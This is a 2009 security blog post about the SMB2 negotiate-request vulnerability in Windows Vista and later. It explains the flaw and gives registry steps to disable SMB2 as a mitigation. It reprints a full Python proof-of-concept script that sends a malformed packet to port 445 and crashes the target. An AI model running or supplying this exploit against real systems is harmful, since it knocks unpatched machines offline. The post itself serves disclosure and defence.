Security Information and Review

Collection of security information and review

The Latest Microsoft Windows SMB Vulnerability

Author : Admin

In this week, the latest Microsoft Windows vulnerability was reported in several sites or blogs, such as securityfocus site, g-laurent blog and others. In the newer Microsoft Windows operating system comes with a new SMB protocol version, it’s known as SMB2. This vulnerability in Microsoft Server Message Block ( SMB ) implementation with specific at SMB2 negotiate protocol request.

The SMB2 ( Server Message Block v2 ) protocol has been introduced in Microsoft Windows Vista and newer Microsoft Windows operating system. SMB2 comes with significant improving performance and reducing the number of commands and sub commands. SMB1 was originally designed by IBM and was shipped on a wide variety of operating system. SMB2 is clear intellectual property ownership by Microsoft.

Array index error in the SMB2 protocol implementation in SRV2.sys kernel driver. SRV2.sys fails to handle malformed SMB headers for the negotiate protocol request functionality. The negotiate protocol request is the first smb query a client send to a SMB server to identify the SMB dialect. See detail about SMB2 and components in Microsoft site.

It’s seriously vulnerability, remote attacker could exploit this vulnerability to execute code with system level privileges. This vulnerability allows remote attackers to cause a denial of service ( system crash ) via an & ( ampersand ) character in a process ID High header field in a negotiate protocol request packet. With this process will triggers an attempted dereference of an out of bounds memory location. This vulnerability can exploit if file and printer sharing enable ( protocol SMB be used to file and printer sharing service ).

There are many exploit that is publicly available , see following proofs of concept was release by Laurent Graffie at g-laurent.blogspot.com.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
 
#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field 
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
 
from socket import socket
from time import sleep
 
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" 
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" 
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" 
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" 
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" 
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" 
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

No patch available at this moment ..? so how to fix this problem ..? one of the way to fix this vulnerability until patch is available by Microsoft or others community, close SMB protocol and port 139 / 445 at our operating system and configure our firewall properly.

Step by step to disable SMB protocol at our operating system :

  1. Click Start – Run, in the edit box type regedit and the click OK.
  2. Find the following key : HKLM\System\CurrentControlSet\Services.
  3. Click LanManServer.
  4. Click Parameters.
  5. Right Click to add a new DWORD with 32 bit value.
  6. Type smb2 in the name data field and the value data field to 0.
  7. Exit.

To ensure and refresh, in the command prompt with administrator privileges, type “net stop server” and the “net start server”. More detail about this advisory, see Microsoft Security Advisory 975497.

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Netvouz
  • DZone
  • ThisNext
  • MisterWong
  • Wists
  • Technorati
  • YahooMyWeb
  • Slashdot
  • StumbleUpon
Categories: Windows Security
Hi. I am a long time reader. I wanted to say that I like your blog and the layout. Peter Quinn
15 September 09 at 10:59
 

[...] rest is here: The Latest Microsoft Windows SMB Vulnerability | Windows Security Share and [...]

 

[...] The Latest Microsoft Windows SMB Vulnerability | Windows Security [...]

If you like this posts, please leave messages / comments.